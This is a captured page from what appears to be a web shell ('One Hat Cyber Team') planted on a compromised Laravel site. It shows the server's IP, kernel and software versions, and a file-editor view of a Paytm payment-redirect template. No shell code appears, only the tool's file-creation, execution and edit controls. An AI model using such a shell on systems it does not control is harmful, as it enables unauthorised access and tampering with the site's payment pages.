One Hat Cyber Team
Your IP :
3.140.196.46
Server IP :
104.21.80.1
Server :
Linux agrigation-prod 5.15.0-67-generic #74-Ubuntu SMP Wed Feb 22 14:14:39 UTC 2023 x86_64
Server Software :
nginx/1.24.0
PHP Version :
7.4.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
forge
/
gftag.com
/
resources
/
views
/
front
/
Edit File:
paytm.blade.php
@extends('master.front') @section('content') <center><h1>{{__("Please do not refresh this page...")}}</h1></center> <form method="post" action="{{ $paytm_txn_url }}" name="f1"> {{ csrf_field() }} <table border="1"> <tbody> <?php foreach($paramList as $name => $value) { echo '<input type="hidden" name="' . $name .'" value="' . $value . '">'; } ?> <input type="hidden" name="CHECKSUMHASH" value="<?php echo $checkSum ?>"> </tbody> </table> </form> @endsection @section('script') <script type="text/javascript"> document.f1.submit(); </script> @endsection
Simpan